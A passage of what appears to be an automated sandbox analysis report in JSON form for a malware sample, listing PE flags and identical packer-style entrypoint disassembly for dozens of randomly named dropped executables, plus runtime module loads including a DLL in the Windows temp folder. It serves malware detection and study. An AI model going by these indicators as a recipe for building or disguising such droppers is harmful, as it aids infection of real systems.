IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"bphhd.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"jvrbx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"njvhn.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"468866.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"664842.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"840664.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"886680.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"404286.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"62664.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"ftbltx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xrfjx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"jnnxfl.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"bjdlj.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"njhpfx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4824668.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"66446.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"00008.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rhxhth.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"tdtflp.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"nxfnfn.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rhnxdp.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"vhxrtdt.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"bdnnt.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"pfdblvl.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"bphhd.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"jvrbx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"njvhn.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"468866.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"664842.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"840664.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"886680.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"404286.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"62664.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"ftbltx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"xrfjx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"jnnxfl.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"bjdlj.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"njhpfx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"4824668.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"66446.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"00008.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rhxhth.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"tdtflp.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"nxfnfn.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rhnxdp.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"tfxnptb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"tfxnptb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"tfxnptb.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"tfxnptb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"tfxnptb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"628008.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"628008.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"628008.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"628008.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"628008.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"nxhlxrp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"nxhlxrp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nxhlxrp.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"nxhlxrp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jbdtnd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"jbdtnd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jbdtnd.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"jbdtnd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jbdtnd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"jbdtnd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 753f0000\n \"rbffv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"rbffv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rbffv.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"rbffv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rbffv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"04284.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 753f0000\n \"jfdjvd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"jfdjvd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jfdjvd.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"jfdjvd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jfdjvd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"nrhhv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"nrhhv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nrhhv.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"nrhhv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nrhhv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"tbbdbn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"tbbdbn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"tbbdbn.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"tbbdbn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"tbbdbn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"xpldnr.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 753f0000\n \"vjdhtlv.exe\" loaded module \"MSVCRT.DLL\" at base 75b20000\n \"vjdhtlv.exe\" loaded module \"SHLWAPI.DLL\" at base 77830000\n \"vjdhtlv.exe\" loaded module \"USER32.DLL\" at base 758a0000\n \"vjdhtlv.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 753f0000\n \"ffpfpp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"ffpfpp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ffpfpp.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"ffpfpp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ffpfpp.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"00688.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"00688.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"00688.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"00688.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"00688.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"8644820.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"8644820.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8644820.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"8644820.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8644820.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"ldnfnvr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"ldnfnvr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ldnfnvr.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"ldnfnvr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ldnfnvr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"jnnjf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"jnnjf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jnnjf.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"jnnjf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jnnjf.exe\" loaded module 